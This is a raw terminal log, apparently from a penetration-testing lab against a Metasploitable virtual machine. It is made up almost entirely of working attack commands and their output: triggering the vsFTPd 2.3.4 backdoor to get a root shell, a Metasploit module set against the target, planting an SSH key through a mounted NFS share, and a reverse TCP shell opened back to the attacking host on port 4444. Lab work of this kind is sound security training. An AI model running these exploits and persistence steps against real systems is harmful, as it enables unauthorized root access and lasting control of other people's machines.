telnet 192.168.52.144 21 Trying 192.168.52.144... Connected to 192.168.52.144. Escape character is '^]'. 220 (vsFTPd 2.3.4) user attack:) 331 Please specify the password.
telnet 192.168.52.144 6200 Trying 192.168.52.144... Connected to 192.168.52.144. Escape character is '^]'. id; uid=0(root) gid=0(root) : command not found python -c 'import pty;pty.spawn("/bin/bash")'; root@metasploitable:/# ls ls bin dev initrd lost+found nohup.out root sys var boot etc initrd.img media opt sbin tmp vmlinuz cdrom home lib mnt proc srv usr
Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 21 yes The target port (TCP)
Exploit target:
Id Name -- ---- 0 Automatic
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set rhost 192.168.52.144 rhost => 192.168.52.144
xin@kali:~$ ssh-keygen Generating public/private rsa key pair. Enter file inwhich to save the key (/home/xin/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identification has been saved in /home/xin/.ssh/id_rsa. Your public key has been saved in /home/xin/.ssh/id_rsa.pub. The key fingerprint is: SHA256:1E7/aDLdsjBakGT1TaaGUsA1MEnTYZWqajDBoaPPjCs xin@kali The key's randomart image is: +---[RSA 3072]----+ | o**Bo..o | | . oB.+.= | | o . = +.+ . | | o o + =.o | | . . . S.. . | |. o .. . + | | = o . * = o | |E + o o * o | |o. . . . | +----[SHA256]-----+
xin@kali:~$ mkdir /tmp/msftables xin@kali:~$ mount -o nolock -t nfs 192.168.52.144:/ /tmp/msftables mount: only root can use "--options" option xin@kali:~$ sudo mount -o nolock -t nfs 192.168.52.144:/ /tmp/msftables [sudo] xin 的密码: xin@kali:~$ cat /home/xin/.ssh/id_rsa.pub >> /tmp/msftables/root/.ssh/authorized_keys bash: /tmp/msftables/root/.ssh/authorized_keys: 权限不够
xin@kali:~$ sudo cat /home/xin/.ssh/id_rsa.pub >> /tmp/msftables/home/msfadmin/.ssh/authorized_keys xin@kali:~$ ssh msfadmin@192.168.52.144 The authenticity of host '192.168.52.144 (192.168.52.144)' can't be established. RSA key fingerprint is SHA256:BQHm5EoHX9GCiOLuVscegPXLQOsuPs+E9d/rrJB84rk. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '192.168.52.144' (RSA) to the list of known hosts. Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law.
To access official Ubuntu documentation, please visit: http://help.ubuntu.com/ No mail. Last login: Tue May 5 04:14:33 2020 To run a command as administrator (user "root"), use "sudo <command>". See "man sudo_root" for details.
Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.52.144 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 139 yes The target port (TCP)
[*] Started reverse TCP double handler on 192.168.52.134:4444 [*] Accepted the first client connection... [*] Accepted the second client connection... [*] Command: echo 7VUWl3ceAVJuDGMo; [*] Writing to socket A [*] Writing to socket B [*] Reading from sockets... [*] Reading from socket B [*] B: "7VUWl3ceAVJuDGMo\r\n" [*] Matching... [*] A is input... [*] Command shell session 2 opened (192.168.52.134:4444 -> 192.168.52.144:60318) at 2020-05-05 17:10:26 +0800